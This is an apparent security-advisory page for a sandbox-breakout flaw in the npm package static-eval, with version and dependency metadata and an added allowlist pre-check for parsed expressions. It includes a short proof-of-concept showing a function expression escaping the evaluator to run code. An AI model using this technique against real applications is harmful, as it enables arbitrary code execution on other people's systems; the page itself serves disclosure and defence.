Ecosyste.ms: Advisories

An open API service providing security vulnerability metadata for many open source software ecosystems.

Security Advisories: MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLTVtanctNmpyaC1odmZx

Sandbox Breakout / Arbitrary Code Execution in static-eval

Affected versions of static-eval pass untrusted user input directly to the global Function constructor, so an attacker who controls the expression being evaluated can execute arbitrary code in the process that calls the package.

Proof of concept

var evaluate = require('static-eval');
var parse = require('esprima').parse;
// An immediately-invoked function expression; in affected versions the
// function body reaches the global Function constructor unchanged.
var src = '(function(){console.log(process.pid)})()';
var ast = parse(src).body[0].expression;
var res = evaluate(ast, {});
// Will print the process id

Recommendation

Update to version 2.0.0 or later.
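Upgrading is the fix; as an added defensive illustration that is not code from the advisory or from static-eval, the walker below shows how a caller can reject any esprima AST containing function definitions or calls before handing it to the evaluator. The node-type allowlist and the inline ASTs are assumptions constructed for this example (ESTree node names as produced by esprima).

```javascript
// Added example, not part of static-eval: allowlist pre-check for an ESTree AST.
// Only plain data and operator nodes are accepted; anything that defines or
// invokes a function is reported. The allowlist itself is an assumption and
// should be narrowed to what the calling application actually needs.
const ALLOWED = new Set([
  'Literal', 'Identifier', 'BinaryExpression', 'LogicalExpression',
  'UnaryExpression', 'ConditionalExpression', 'ArrayExpression',
  'ObjectExpression', 'Property', 'MemberExpression',
]);

// Walk the AST and collect every node type that is not on the allowlist.
function disallowedNodes(node, found = []) {
  if (node === null || typeof node !== 'object') return found;
  if (Array.isArray(node)) {
    node.forEach((child) => disallowedNodes(child, found));
    return found;
  }
  if (typeof node.type === 'string' && !ALLOWED.has(node.type)) found.push(node.type);
  for (const key of Object.keys(node)) {
    if (key === 'type' || key === 'loc' || key === 'range') continue; // metadata
    disallowedNodes(node[key], found);
  }
  return found;
}

// True only when the AST contains nothing outside the allowlist.
function isSafeForStaticEval(ast) {
  return disallowedNodes(ast).length === 0;
}

// Constructed sample: esprima's AST shape for the advisory's proof-of-concept
// expression `(function(){console.log(process.pid)})()`.
const iifeAst = {
  type: 'CallExpression',
  callee: { type: 'FunctionExpression', id: null, params: [], body: { type: 'BlockStatement', body: [
    { type: 'ExpressionStatement', expression: { type: 'CallExpression',
      callee: { type: 'MemberExpression', computed: false, object: { type: 'Identifier', name: 'console' }, property: { type: 'Identifier', name: 'log' } },
      arguments: [ { type: 'MemberExpression', computed: false, object: { type: 'Identifier', name: 'process' }, property: { type: 'Identifier', name: 'pid' } } ] } },
  ] } },
  arguments: [],
};

// Constructed sample: a benign arithmetic expression `1 + 2 * x`.
const arithmeticAst = { type: 'BinaryExpression', operator: '+',
  left: { type: 'Literal', value: 1 },
  right: { type: 'BinaryExpression', operator: '*', left: { type: 'Literal', value: 2 }, right: { type: 'Identifier', name: 'x' } } };

console.log(isSafeForStaticEval(iifeAst), isSafeForStaticEval(arithmeticAst)); // false true
```

In real use the ASTs come from esprima's parse() as in the proof of concept above; the pre-check is a defence in depth and does not replace the upgrade to 2.0.0.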

Permalink: https://github.com/advisories/GHSA-5mjw-6jrh-hvfq
JSON: https://advisories.ecosyste.ms/api/v1/advisories/MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLTVtanctNmpyaC1odmZx
Source: GitHub Advisory Database
Origin: Unspecified
Severity: Moderate
Classification: General
Published: over 5 years ago
Updated: 8 months ago
Identifiers: GHSA-5mjw-6jrh-hvfq, CVE-2017-16226
References: Repository: https://github.com/substack/static-eval
Blast Radius: 0.0

Affected Packages

npm:static-eval
Dependent packages: 109
Dependent repositories: 132,071
Downloads: 13,754,600 last month
Affected Version Ranges: < 2.0.0
Fixed in: 2.0.0
All affected versions: 0.0.0, 0.1.0, 0.1.1, 0.2.0, 0.2.1, 0.2.2, 0.2.3, 0.2.4, 1.0.0, 1.1.0, 1.1.1
All unaffected versions: 2.0.0, 2.0.1, 2.0.2, 2.0.3, 2.0.4, 2.0.5, 2.1.0, 2.1.1